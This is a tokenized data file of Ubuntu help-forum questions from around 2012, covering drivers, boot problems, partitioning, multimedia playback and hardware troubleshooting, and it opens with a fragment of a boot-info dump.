/ubuntu/disks/root.disk /ubuntu/disks/swap.disk sda3/wubi : _______________________________________ file system : ext3 boot sector type : - boot sector info : operating system : ubuntu 11.10 boot files : /boot/grub/grub.cfg /etc/fstab sda4 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /wubildr ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda2 * 2,048 3,074,047 3,072,000 7 ntfs / exfat / hpfs /dev/sda3 3,074,048 600,561,663 597,487,616 7 ntfs / exfat / hpfs /dev/sda4 600,563,712 625,139,711 24,576,000 7 ntfs / exfat / hpfs '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 e4635099-89df-4538-8a43-cefac4a53b3b ext3 /dev/sda2 9adc7b2ddc7b0335 ntfs system_drv /dev/sda3 dac07e77c07e59a9 ntfs windows7_os /dev/sda4 982e820f2e81e71a ntfs lenovo_recovery ================================ mount points : ================================= device mount_point type options /dev/loop0 / ext3 ( rw , commit=0 , commit=0 ) /dev/sda3 /host fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) ======================== sda3/wubi/boot/grub/grub.cfg : =========================
124490	how to setup proximus mobile broadband ?	we 've got mobile broadband from proximus , but the software provided with it is for windows and mac only . if i simply plug it in in an ubuntu laptop , it brings up a wizard which helps you setting everything up . the mobile broadband provider is listed there . only when i try to connect , it does n't work . it just keeps trying to connect for a few minutes , but eventually fails . i 've tried entering the pin and changing the dns servers , but to no effect . what else can i try ?
124499	installing ubuntu 11.10 on laptop with ubuntu9.04	i have ubuntu 9.04 currently and i ca n't get the ubuntu 11.10 install disk to work . when i boot the 11.10 disc it hangs with the message : isolinux 4.04 20110518 etcd copyright ( c ) 1994-2011 h.peter anvin et al i also tried to insert disc once the computer was started up and tried to boot from there but nothing happened . i opened the files on the disc and clicked on wubi.exe , which then gives three options . i chose the `` install ubuntu '' option and when i click on reboot now it does not respond . i ordered the ubuntu disc so it ca n't be a bad burn .
124500	internet connection sharing from pc to phone over bluetooth	i have already read other questions relating to sharing internet connection from the phone to the pc . this as most of us know works out of the box in latest ubuntu ( and for some it just needs to either add an additional package or install a package in the cell ) . this is not the case here . what i am looking for is the following : internet arrives at the pc via ethernet cable . pc has bluetooth and i would like to share the internet via bluetooth . phone should connect to bluetooth and receive internet via bluetooth . how can i share an internet connection via bluetooth from the pc to the phone . already tested blueman and is not working for this . i am using a nokia n900 and a samsung galaxy s .
124510	after nvidia driver install , lightdm wo n't start automatically	i did a clean install and after installing updates and drivers ( nvidia vga ) for a 460gtx , i 'm shown a black screen with various stopping/starting messages . the last of these messages is different ( this time it 's `` stopping save kernel messages '' ) every time i try and boot up the system . logging into tty1 and doing sudo startx or start lightdm works . nvidia drivers seem to be working . some things i 've tried or noticed . problem seems to start after installing nvidia drivers . cat /etc/x11/default-display-manager spits out /usr/sbin/lightdm . sudo dpkg-reconfigure lightdm gives me dpkg_maintscript_name and package missing . also restored lightdm settings and reinstalled it .
124511	how can i keep the cpu temp low ?	i have an hp pavilion dv7 , i 'm using ubuntu 12.04 so the overheating problem with sandybridge cpu is a lot better . however my laptop is still becoming too hot to keep on my legs . the problem is that the fan wait too much before starting , so the medium temp is too hight . when i 'm using windows 7 the laptop is room-temperature cold , i 've absolutely no problem . on windows the fan is always spinning very low & very silently so the heat is continuously removed , without reaching an unconfortable temp . how can i force the computer to act like that also on ubuntu ? ps the bios ca n't let me control this kind of thing , and this is my experience with lm-sensors and fancontrol al @ notebook : ~ $ sudo sensors-detect [ sudo ] password for al : # sensors-detect revision 5984 ( 2011-07-10 21:22:53 +0200 ) # system : hewlett-packard hp pavilion dv7 notebook pc ( laptop ) # board : hewlett-packard 1800 this program will help you determine which kernel modules you need to load to use lm_sensors most effectively . it is generally safe and recommended to accept the default answers to all questions , unless you know what you 're doing . some south bridges , cpus or memory controllers contain embedded sensors . do you want to scan for them ? this is totally safe . ( yes/no ) : y module cpuid loaded successfully . silicon integrated systems sis5595 ... no via vt82c686 integrated sensors ... no via vt8231 integrated sensors ... no amd k8 thermal sensors ... no amd family 10h thermal sensors ... no amd family 11h thermal sensors ... no amd family 12h and 14h thermal sensors ... no amd family 15h thermal sensors ... no amd family 15h power sensors ... no intel digital thermal sensor ... success ! ( driver `coretemp ' ) intel amb fb-dimm thermal sensor ... no via c7 thermal sensor ... no via nano thermal sensor ... no some super i/o chips contain embedded sensors . we have to write to standard i/o ports to probe them . this is usually safe . do you want to scan for super i/o sensors ? ( yes/no ) : y probing for super-i/o at 0x2e/0x2f trying family `national semiconductor/ite ' ... no trying family `smsc ' ... no trying family `via/winbond/nuvoton/fintek ' ... no trying family `ite ' ... no probing for super-i/o at 0x4e/0x4f trying family `national semiconductor/ite ' ... yes found unknown chip with id 0x8518 some hardware monitoring chips are accessible through the isa i/o ports . we have to write to arbitrary i/o ports to probe them . this is usually safe though . yes , you do have isa i/o ports even if you do not have any isa slots ! do you want to scan the isa i/o ports ? ( yes/no ) : y probing for `national semiconductor lm78 ' at 0x290 ... no probing for `national semiconductor lm79 ' at 0x290 ... no probing for `winbond w83781d ' at 0x290 ... no probing for `winbond w83782d ' at 0x290 ... no lastly , we can probe the i2c/smbus adapters for connected hardware monitoring devices . this is the most risky part , and while it works reasonably well on most systems , it has been reported to cause trouble on some systems . do you want to probe the i2c/smbus adapters now ? ( yes/no ) : y using driver `i2c-i801 ' for device 0000:00:1f.3 : intel cougar point ( pch ) module i2c-i801 loaded successfully . module i2c-dev loaded successfully . next adapter : i915 gmbus disabled ( i2c-0 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gmbus ssc ( i2c-1 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gpiob ( i2c-2 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gmbus vga ( i2c-3 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gpioa ( i2c-4 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gmbus panel ( i2c-5 ) do you want to scan it ? ( yes/no/selectively ) : y client found at address 0x50 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... no probing for `edid eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) next adapter : i915 gpioc ( i2c-6 ) do you want to scan it ? ( yes/no/selectively ) : y client found at address 0x50 probing for `analog devices adm1033 ' ... no probing for `analog devices adm1034 ' ... no probing for `spd eeprom ' ... no probing for `edid eeprom ' ... yes ( confidence 8 , not a hardware monitoring chip ) next adapter : i915 gmbus dpc ( i2c-7 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gpiod ( i2c-8 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gmbus dpb ( i2c-9 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gpioe ( i2c-10 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gmbus reserved ( i2c-11 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gmbus dpd ( i2c-12 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : i915 gpiof ( i2c-13 ) do you want to scan it ? ( yes/no/selectively ) : y next adapter : dpddc-b ( i2c-14 ) do you want to scan it ? ( yes/no/selectively ) : y now follows a summary of the probes i have just done . just press enter to continue : driver `coretemp ' : * chip `intel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) y successful ! monitoring programs wo n't work until the needed modules are loaded . you may want to run 'service module-init-tools start' to load them . unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok al @ notebook : ~ $ sudo /etc/init.d/module-init-tools restart rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service module-init-tools restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop module-init-tools ; start module-init-tools . the restart ( 8 ) utility is also available . module-init-tools stop/waiting al @ notebook : ~ $ sudo service module-init-tools restart stop : unknown instance : module-init-tools stop/waiting al @ notebook : ~ $ sudo service module-init-tools start module-init-tools stop/waiting al @ notebook : ~ $ sudo pwmconfig # pwmconfig revision 5857 ( 2010-08-22 ) this program will search your sensors for pulse width modulation ( pwm ) controls , and test each one to see if it controls a fan on your motherboard . note that many motherboards do not have pwm circuitry installed , even if your sensor chip supports pwm . we will attempt to briefly stop each fan using the pwm controls . the program will attempt to restore each fan to full speed after testing . however , it is ** very important ** that you physically verify that the fans have been to full speed after the program has completed . /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed is my case too desperate ?
124513	how to sync contacts in 12.04 with thunderbird / ubuntu one ?	how to get google contacts to sync with thunderbird / ubuntu one in ubuntu 12.04 beta ? i want to sync google contacts with thunderbird , ultimately to allow using the unity contacts lens from the ataraeo ppa : https : //launchpad.net/~atareao/+archive/lenses note : this question is not a duplicate of previous questions : '' import gmail contacts into thunderbird via ubuntu one ? '' or `` thunderbird contacts sync with ubuntu one '' or `` how to sync ubuntu one contacts with thunderbird ? '' . previous solutions do not work on 12.04 beta . in previous versions of ubuntu one there was a sync contacts button . see : 11.04 screenshot . in ubuntu 12.04 beta there is no sync contacts function . see : this is a screenshot of the desired unity contacts lens in action : link to unity contacts lens ppa : https : //launchpad.net/~atareao/+archive/lenses
124514	vst plugins not displaying properly	i tried to work with several linux native vst instruments plugins but , each time , i had the same problem : the interface does not display properly . an example of what i mean : no text , as you can see . i tried the following : tonescape ( http : //www.mucoder.net/en/tonespace/ ) and every tal plugins ( http : //sourceforge.net/projects/distrho/files/ports/tal-plugins/ ) . i 'm using ubuntu 11.10 with unity 2d .
124515	does ubuntu 's bootloader support native virtual machine booting ?	i 'm still fairly new to linux and i was wondering if the ubuntu boot loader can be configured to boot natively to a virtual machine similar to windows7/server 2008 `` vhd with native boot '' feature ? i 've tried running a virtual machine using virtualbox but it 's very slow on my system . i 've also tried using vmware play which is much faster , but still the response time is n't the greatest . also , i 'd rather leave a dual boot as a last resort .
124516	how do i get the mind program running ?	i learned about the mind program for content filtering here . i installed mind-toy_1.1 ... deb . since there 's no content blocking happening , i assume it is not working . i got a response using pidof mind ; does that mean it 's running ? i also looked over the .conf files but i did n't see anything that should be switched on . there seems to be almost no user information available for mind , and my trouble shooting knowledge is n't strong . update : i successfully installed dansguardian and squid . i hoping i can switch out dansguardian for mind by applying the current configuration . mind seems to be the successor to dansguardian so i still want to get it working .
124518	how to autocomplete formulas in libreoffice calc	i recently moved from ms excel 2007 to libreoffice calc ( now using ubuntu 11.10 ) and there are some things that i still can not do in libreoffice calc . one of these things is formula autocompletion . in excel , if i type `` =av '' , excel shows me a list of formulas , and then i can hit the tab key to autocomplete the formula . in libreoffice calc , if i write `` =av '' , it shows me the alternative `` =average '' but if i hit tab , it does not autocomplete . the cursor simply moves to the next cell . is it possible to configure libreoffice calc to autocomplete formulas by hitting tab or some other shortcut ?
124540	how can i copy a file to a new location , creating the directory as well	i want to cp a file to another directory but that directory does n't exist yet . so i would do : mkdir /new_place cp the_file /new_place can i do this in one ? i imagine something like cp the_file -m /new_place if `` m '' stood for `` make dir 's that do n't exist '' would this be a chance to use scp , rsync or another copying utility ?
124546	what personalisation software is available ?	what personalisation ( software ) would you recommend for ubuntu 11.10 ? i would greatly appreciate it .
124553	ubuntu recognizes my slave hdd , but does n't show it	i have two hard drives in my pc . there is one with 80gb where the ubuntu 11.10 is installed and another where i have all my folders , datas , musics , games , etc . the second one just does n't appear for me . i do n't have any option about it . i tried to search and apply a lot of codes , but i did not get the right way to do it .
124554	how to resolve `` permission denied '' when emptying the trash ?	i installed a game , and then decided to erase it . i sent it to the recycle bin , but i was unable to delete it completely ( permission denied ) . when i moved it back to the desktop , a copy remained in the recycle . i sent it back to the bin , and back to the desktop ; so i ended with 2 copies of the file in the bin , and one on the desktop . finally i noticed that a file inside the game was protected . i changed the permission settings to the desktop copy and i was able to erase it completely , but i was not able to change the permission settings on the 2 copies i still have in the bin ( the backend do not support the operation ) i just want to empty the recycle bin !
124555	uinput wo n't load - even manually	i 'm trying to get input to work so that i can remote control myth with a sony ps3 remote control . the remote pairs okay - but none of the buttons on it work . i 've added uinput to /etc/modules - but that has n't made any difference . i 've also tried launching uinput manually by entering 'sudo modprobe uinput ' . no errors are reported when i do that - but when i then enter 'lsmod | grep uinput ' , nothing gets returned . i 'm perplexed . various forums suggest that uinput is broken on ubuntu - but surely that is n't the case , is it ? i 'm running 11.10 oneiric ocelot .
124556	installed ati/amd proprietary fglrx driver , but it is not being used by window manager . how do i enable it ?	i have conflicting information being given to me , on the one hand the `` additional drivers '' panel mentions that the ati/amd proprietary driver is installed , but the `` details '' panel tells me the `` gallium 0.4 on llvmpipe ( llvm 0x300 ) `` is in use . i am using ubuntu 12.04 beta how do i make sure the ati driver is used ? section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` module '' load `` dri2 '' load `` dbe '' load `` dri '' load `` glx '' load `` record '' load `` extmod '' load `` fgl.renamed.libglx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` device '' identifier `` card0 '' driver `` fbdev '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` card1 '' driver `` vesa '' busid `` pci:1:0:0 '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] endsection
124558	how can i get the nautilus icon to display on the panel ?	this seems to be so obvious and simple but i ca n't see any quick way to achieve it in lucid . because nautilus does not appear in a menu there seems to be no obvious way of right-clicking and showing it on the panel .
124559	`` can not locate suitable jar utility '' while trying to install oracle java jdk	i have installed jdk-7u3-linux-i586.tar.gz according to this : how do i install oracle java jdk 7 ? but when i try to install java_ee_sdk-6u4-unix.sh using the command sudo sh java_ee_sdk-6u4-unix.sh from inside the /home//downloads/ directory i get the message could not locate a suitable jar utility . please ensure that you have java 6 or newer installed on your system and accessible in your path or by setting java_home note : even though i get the mesage `` could not locate a suitable jar utility . please ensure that you have java 6 or newer installed on your system and accessible in your path or by setting java_home '' commands `` java '' , `` javac '' are working from any location .
124562	sound settings revert to wrong hardware profile after screen saver	i face a problem since about a month ago . i have a tv connected to my pc with hdmi but audio goes to my stereo ( analog ) . the setup works great but each time the i return from the screen saver , the sound settings revert to a hdmi output only profile . i need the `` analog stereo duplex '' setting . on oneiric i access this setting : sound settings- > hardware ( tab ) - > profile : anybody know how to keep it from changing or why it happens ? it started occurring mid march .
124564	google chrome kiosk screen does not maximize	i have set up a chrome kiosk using a custom session in x to run google chrome . it generally runs pretty well except except for a screen size issue . i have a `` chrome.desktop '' session file saved in /usr/share/xsessions with the following contents . [ desktop entry ] name=chrome comment=this session logs you into google chrome exec=/usr/share/xsessions/chromekiosk.sh icon= type=application encoding=utf-8 there is also a chromekiosk.sh file that is used to execute chrome . it is also in /usr/share/xsessions . the contents are as follows . # ! /bin/bash while true ; do google-chrome http : //news.bbc.co.uk -- kiosk -- start-maximized -- disable-restore-background-contents -- login-screen-size= '' 1024,768 '' -- disable-translate -- disable-new-tab-first-run -- enable-vertical-tabs ; sleep 5s ; done the problem that i am having is that google chrome ( or firefox , or opera . i have tried various apps ) , will not maximise to the entire 1024x768 display . it seems to be leaving approximately 1 centimetre of space on the right hand side of the display ( i can see the desktop ) , and also some space at the bottom of the screen . i have tried this on at least 2 different computers . one had a higher resolution screen . it left an even bigger gap . it is as if the application that it being run thinks the screen is smaller than it actually is . does anybody have any idea what is going on ? i am going nuts with this problem . here is an image so you can see the border google chrome kiosk xsession with odd border that image is from a screen with a 1280 width .
124565	mkfs.vfat : unable to open /dev/sdg1 : device or resource busy	i am using a script from http : //www.angstrom-distribution.org/demo/beagleboard/ that uses mkfs.vfat and mkfs.e2fs to create 2 partitions on a sd card but i get mkfs.vfat 3.0.12 ( 29 oct 2011 ) mkfs.vfat : unable to open /dev/sdg1 : device or resource busy edit : there 's a problem with this script . as a workaround i used http : //code.google.com/p/beagleboard/wiki/linuxbootdiskformat the script is the following # ! /bin/sh # mkcard.sh v0.5 # ( c ) copyright 2009 graeme gregory < dp @ xora.org.uk > # licensed under terms of gplv2 # # parts of the procudure base on the work of denys dmytriyenko # http : //wiki.omap.com/index.php/mmc_boot_format export lc_all=c if [ $ # -ne 1 ] ; then echo `` usage : $ 0 < drive > '' exit 1 ; fi drive= $ 1 dd if=/dev/zero of= $ drive bs=1024 count=1024 size=`fdisk -l $ drive | grep disk | grep bytes | awk ' { print $ 5 } '` echo disk size - $ size bytes cylinders=`echo $ size/255/63/512 | bc` echo cylinders - $ cylinders { echo ,9,0x0c , * echo , , , - } | sfdisk -d -h 255 -s 63 -c $ cylinders $ drive sleep 1 if [ -x `which kpartx` ] ; then kpartx -a $ { drive } fi # handle various device names . # note something like fdisk -l /dev/loop0 | egrep -e '^/dev ' | cut -d ' ' -f1 # wo n't work due to https : //bugzilla.redhat.com/show_bug.cgi ? id=649572 partition1= $ { drive } 1 if [ ! -b $ { partition1 } ] ; then partition1= $ { drive } p1 fi drive_name=`basename $ drive` dev_dir=`dirname $ drive` if [ ! -b $ { partition1 } ] ; then partition1= $ dev_dir/mapper/ $ { drive_name } p1 fi partition2= $ { drive } 2 if [ ! -b $ { partition2 } ] ; then partition2= $ { drive } p2 fi if [ ! -b $ { partition2 } ] ; then partition2= $ dev_dir/mapper/ $ { drive_name } p2 fi # now make partitions . if [ -b $ { partition1 } ] ; then umount $ { partition1 } mkfs.vfat -f 32 -n `` boot '' $ { partition1 } else echo `` cant find boot partition in /dev '' fi if [ -b $ { parition2 } ] ; then umount $ { partition2 } mke2fs -j -l `` angstrom '' $ { partition2 } else echo `` cant find rootfs partition in /dev '' fi full output is : 1024+0 records in 1024+0 records out 1048576 bytes ( 1.0 mb ) copied , 0.356157 s , 2.9 mb/s disk /dev/sdg does n't contain a valid partition table disk size - 7948206080 bytes cylinders - 966 checking that no-one is using this disk right now ... ok disk /dev/sdg : 966 cylinders , 255 heads , 63 sectors/track sfdisk : error : sector 0 does not have an msdos signature /dev/sdg : unrecognized partition table type old situation : no partitions found new situation : units = cylinders of 8225280 bytes , blocks of 1024 bytes , counting from 0 device boot start end # cyls # blocks id system /dev/sdg1 * 0+ 8 9- 72261 c w95 fat32 ( lba ) /dev/sdg2 9 965 957 7687102+ 83 linux /dev/sdg3 0 - 0 0 0 empty /dev/sdg4 0 - 0 0 0 empty successfully wrote the new partition table re-reading the partition table ... if you created or changed a dos partition , /dev/foo7 , say , then use dd ( 1 ) to zero the first 512 bytes : dd if=/dev/zero of=/dev/foo7 bs=512 count=1 ( see fdisk ( 8 ) . ) umount : /dev/sdg1 : not mounted mkfs.vfat 3.0.12 ( 29 oct 2011 ) mkfs.vfat : unable to open /dev/sdg1 : device or resource busy umount : /dev/sdg2 : not mounted mke2fs 1.42 ( 29-nov-2011 ) /dev/sdg2 is apparently in use by the system ; will not make a filesystem here ! i 've tried sudo fuser -v /dev/sdg sudo fuser -v /dev/sdg1 sudo fuser -v /dev/sdg2 but with no results . thanks
124570	is there a version of ubuntu server that will install from a usb drive ?	i am trying to install ubuntu server on a computer that has no cd drive and it is trying to detect a cd drive and fails whenever it cant find it .
124578	black screen when playing a movie in vlc player in kubuntu 12.04	this is not a duplicate of this question . in my situation , my avi files will play correctly in other installed players -- but not in vlc . unfortunately , i need frame-by-frame controls , and vlc is the only player i have installed that offers that feature . but vlc wo n't always play my avi files . it seems to depend on the recording options ( such as hd or standard def and frame rate ) , although i 'm not entirely sure why some play and some do n't . given that some other players on my system play these files , can i assume i have all the drivers needed ? the players that work include mplayer and dragon player . everything is fine in those players . and vlc sometimes plays avi video files . ( the files it wo n't play are played by the other players , so i believe my system has all the codecs required . ) when i installed kubuntu i installed these packages : sudo apt-get -- yes install app-install-data-medibuntu apport-hooks-medibuntu sudo apt-get install w64codecs libdvdcss2 non-free-codecs ffmpeg libxine1-ffmpeg gxine mencoder libmpcdec6 libquicktime2 libmp4v2-2 flac faac faad sox ffmpeg2theora libmpeg2-4 uudeview flac libmpeg3-1 mpeg3-utils mpegdemux liba52-dev mpeg2dec vorbis-tools id3v2 mpg123 libflac++6 ffmpeg totem-mozilla icedax tagtool easytag id3tool lame libmad0 libjpeg-progs kubuntu-restricted-extras libdvdread4 ( do i need all those ? ) these were not installed : gstreamer0.10-plugins-ugly-multiverse gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-bad gstreamer0.10-plugins-ugly gstreamer0.10-ffmpeg
124579	no root file stystem is defined error when installing ?	hey guys first time user and i dont know much here ... basically i took apart this old computer and reformatted the hard drive so its fresh , the install utility for ubuntu boots up and everything but when i get to the actual install page it gives me a window with '' no root file stystem is defined so i try to hit some of the buttons but none of them are clickable ... and i cant change the drop window on the bottom at all the one with /dev/sda so and currently im just running it off the cd with the try it mode and trying to run the install from it when the os is working can anyone throw me some help ? =/
124582	installing ubuntu on a new solid state drive	i dropped my laptop and my hard disk is corrupted . i had dual boot win7 and ubuntu on my dell inspiron 15r laptop . i have purchased a new crucial 64 gb m4 2.5-inch solid state drive . i want to install ubuntu 11.10 or 12.04 on this hard drive . it will be a fresh install . i am planning to put this ssd in my laptop and then install ubuntu . so my questions are : is it possible ? is there anything that i need to take care of at the time of installation ? how ubuntu performs on ssd ? if installed ubuntu will be my only os on my laptop .
124588	trying to run vmware 8.0.2 on 11.10 x64 ?	i have downloaded vmware 8 for linux . i am running ubuntu 11.10 x64 . i am very new to linux , and i am having trouble getting vmware 8 to install . i know that there must be a sudo command to get the vmware to unpack , but i do n't know what it is . can anyone help a extremely new linux guy with this ?
124596	`` could not connect to device '' error with a hdm lg2100 evdo modem	i have some trouble with ubuntu 12.04 because i ca n't connect to the internet using wvdial and my modem hdm lg 2100 evdo from inwi isp i get something like that `` could not connect to device /dev/ttyusb1 '' so please , how can i figure out this problem ? ?
124597	can not receive files over bluetooth in ubuntu	ubuntu you should add device to receive from it .so how can i receive a files from another devices without add them .
124602	all sounds that come out of wine are distorted with buffer underruns	i 've been having a lot of problems getting any of my applications to work under wine . i get everything installed fine , the games run great but they all suffer from the same problem . really really distorted sound ! i 've tried going into winecfg and setting the audio settings to alsa and then setting it to emulation but that does n't solve anything . at one point i got half-life to work fine but then in trying to do something else i messed it up , unfortunately i do n't remember what that was or what i did to get it working . there are sounds being made but they come extremely stuttered and unusable . please let me know if there 's anything i can do to give you more information but i 'm pretty sure the problem is from buffer underrun errors . i do n't really know what those are or how to deal with them but i 've seen that in debug output most of the time i 'm having issues .
124604	why wo n't my computer turn on ?	yes , as dumb of a question as it is . this is the only place i knew of to get a fast answer . pressing the power button does nothing . power cord connected and circuit is getting power . if i flip the off switch on the power supply and unplug the cord for about 10 minutes , then plug it back in and , turn on the power supply , then push the power button on the front . it starts to turn on for 2 seconds , but shuts off and never gets to the bios and never even turns the monitor on . is this a bad power supply ? or is it some other issue ? i was thinking the power supply , but do n't want to buy a new one to only find out its not the problem . p.s . this is ubuntu related mainly because i use nothing but gnu/linux operating systems : -d and will most likely be doing a fresh install of 12.04 once its working again ! ! !
124609	gnome classic in 12.04 gives black screen	i have gnome classic installed from my 11.10 install . whenever i try to boot into it on 12.04 beta , it gives me a black screen and does not load . is there a way to see what is going on that it does n't want to load ? i really want to give classic a try .
124614	what is the default calendar program ?	i 've noticed that ubuntu does n't come with a default calendar program ... why not ?
124615	broadcom bcm4313 wireless too slow	hi i have an hp pavilion g6 series with a slow internet connection i tried wifi and lan but always the same problem my broadcom is a corporation bcm4313 . i also tried fedora the last version but could n't get any connection , but on windows 7 all worked just fine .
124617	easy bcd help : dual boot win7 and ubuntu 11.10 -- `` add new entry '' for ubuntu	i first had ubuntu 11.10 installed on a single partition on my 750gb hard drive . i then partitioned the hard drive to 500gb ( for ubuntu ) in ext4 format ( what it already was from the clean install of ubuntu ) ... .and 250gb for win7 in nfts format . then i installed win7 onto that 250gb partition . installation went smoothly and i was successfully booted into win7 and setting everything up . after i was done doing all the stupid updates from microsof , i thought i was done and i wanted to go back to ubuntu . this is where the problem starts of course i reboot and it goes directly to win7 . i research and find that win7 has overwritten the ubuntu bootloader , etc etc.. i do n't fully understand it . i download easybcd 2.1.2 in easybcd , i select `` add new entry '' and select `` linux/bsd '' and change the type to `` grub 2 '' and name it `` ubuntu '' next , i go to `` bcd deployment '' and select `` install the windows vista/7 bootloader to the mbr '' and click `` write mbr '' i reboot , select `` ubuntu '' and the purple screen comes up , but nothing happens . if i hit ctrl+alt+del , it goes to the login menu where it acts normal for about 10-15 seconds , then freezes . it does this repeatedly every time . my question : what 's wrong here ? why ca n't i load ubuntu now ? am i going to have to reinstall ubuntu with windows , then set up the bootloader with easybcd instead of ubuntu , then win7 ? any and all help is appreciated ! -brad
124619	how to view/mount other partitions on your hard drive	recently i have installed ubuntu 12.04 beta 2 on a usb flash drive and decided to install it on an old external hdd which i have taken out of the casing and succesfully mounted in my desktop computer . there is no other operating system besides the newly install ubuntu . however , there is about 500gb of data on the drive . this is why i used a partitioning software on my windows 7 netbook to partition the hard drive to set aside 1tb for files , 350gb of space for linux and the remaining 650gb for vista which i plan on installing soon . but this is where the problem sets in ... when installing ubuntu it does not recognize that the drive is partitioned at all , it 's just one big open block of space ... so i used the installers built in partitioning feature to set aside 300gb for main ubuntu install and 50gb for swap space . i set both of these partitions to be created at the `` end '' so that it would n't delete or write over my data . and this is where i am really lost ; when booting into ubuntu i am able to use it perfectly fine , got on internet , etc ... but i have no clue as to how i can view files that were previously on the drive ( all of my data that i had prior to install ) . how can i mount/be able to view the other partition so that i can have access to my data ? thank you ahead of time ! i really appreciate any help or advice ! ~preston
124626	how can i achieve a more upstream gnome 3.4 desktop ?	when using ubuntu 12.04 and gnome-shell i feel that i am being cheated out of the wonderful experience that is gnome . to better understand try fedora 17 . my question is basically how do i achieve a more vanilla gnome 3 desktop . the main differences are in the subtle things actually , the overall look of the theme , the control center , etc . i think however i may have answered my own question by doing some additional research . i think that some of the things i like may actually be fedora features and some of the thing that are missing may be because for whatever reason ubuntu did n't upgrade all packages to 3.4 but only some . i am currently installing updates after adding the gnome team ppa and i am hoping this will do the trick .
124627	wiped ubuntu files , bootloader still there , how can i remove it and restore windows ?	i had ubuntu installed through the windows 7 dual boot option . not knowing exactly what i was doing , i just deleted the files from my computer . now each time i boot up the computer , it still asks me which operating system to boot . how can i restore windows ?
124631	why are updates downloading so slow ?	all other connection speeds are normal , average download speed is about 2mbps but my updates are lucky to get to 100kbps . updates and this website are the only things running any ideas what the problem could be ?
